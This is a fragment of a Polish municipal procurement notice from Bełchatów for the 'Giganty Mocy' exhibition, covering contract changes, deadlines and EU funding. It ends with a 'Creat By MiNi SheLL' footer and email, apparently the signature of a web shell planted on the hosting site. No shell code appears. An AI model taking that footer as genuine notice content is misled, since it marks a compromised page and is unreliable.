<li>2 - Termin realizacji - 10</li>
<li>3 - Okres gwarancji - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany zapisów umowy w następujących przypadkach: 
1. Urzędowej zmiany stawki podatku VAT, powodującej zmianę wynagrodzenia brutto;
2 Oznaczenia danych dotyczących Zamawiającego i/lub Wykonawcy;
3. Zmianę terminu realizacji przedmiotu zamówienia, w przypadku:- braku przygotowania obiektu do montażu elementów ekspozycji,
- gdy wykonanie zamówienia w pierwotnie określonym terminie nie leży w interesie Zamawiającego - o okres umożliwiający osiągnięcie uzasadnionego interesu Zamawiającego,
- działania siły wyższej uniemożliwiającej wykonanie umowy w pierwotnie ustalonym terminie - o okres niezbędny do usunięcia skutków działania siły wyższej,
- wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, pomimo zachowania należytej staranności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.belchatow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Bełchatowa
ul. Kościuszki 1, bud. B p.13
97-400 Bełchatów.</p><p><b>IV.4.2) Opis potrzeb i wymagań zamawiającego określonych w sposób umożliwiający przygotowanie się wykonawców do udziału w dialogu konkurencyjnym lub informacja o sposobie uzyskania tego opisu:</b> Ze względu na złożony charakter przedmiotu zamówienia, polegający na wykonaniu prezentacji multimedialnych, animacji komputerowych, pisania programów komputerowych, tworzeniu portali internetowych, zabawek, modeli maszyn wydobywczych, makiet przestrzennych, a także dostawę i montaż sprzętu niezbędnego dla prawidłowego prezentowania elementów ekspozycji Giganty Mocy, Zamawiający nie jest w stanie rzetelnie   określić, które z dostępnych rozwiązań technicznych będzie najbardziej odpowiadało potrzebom związanym z realizacją przedsięwzięcia. Brak jednolitych standardów dla realizacji tego typu zadań uniemożliwia dokonania przez Zamawiającego opisu przedmiotu zamówienia przez wskazanie wymaganych parametrów i cech jakościowych, a także obiektywnego opisu funkcjonalnego.



Językiem obowiązującym w porozumiewaniu jest język polski
Pisemne zapytania należy kierować na adres: 


Urząd Miasta Bełchatowa
Biuro Zamówień Publicznych
ul. Kościuszki 1
97-400 Bełchatów
Fax. (44) 733-51-97
W postępowaniu o udzielenie zamówienia  oświadczenia,zawiadomienia oraz 
informacje, zamawiający i wykonawcy przekazują faksem. Każda ze stron na żądanie drugiej -  niezwłocznie potwierdza fakt ich otrzymania.

Zamawiający nie dopuszcza aby  wnioski o dopuszczenie do udziału w postępowaniu przekazywane  były  faksem. Obowiązuje forma pisemna.

Minimalny okres gwarancyjny wymagany dla elementów zrealizowanych i dostarczonych w wyniku postępowania wynosi 24 miesiące.</p><p><b>IV.4.3) Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:</b> Zamawiający nie przewiduje nagród.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.01.2013 godzina 10:00, miejsce: Urząd Miasta Bełchatowa
ul. Kościuszki 1, bud. B p.13
97-400 Bełchatów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie zrealizowane w ramach projektu Budowa Miejskiego Centrum Kultury wraz z ekspozycją Giganty Mocy dofinansowanego z Europejskiego Funduszu Rozwoju Regionalnego w ramach  RPO WŁ na lata 2007 - 2013. Umowa o dofinansowanie nr UDA-RPLD.05.04.00-00-064/10-00 z 10 grudnia 2010 roku..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com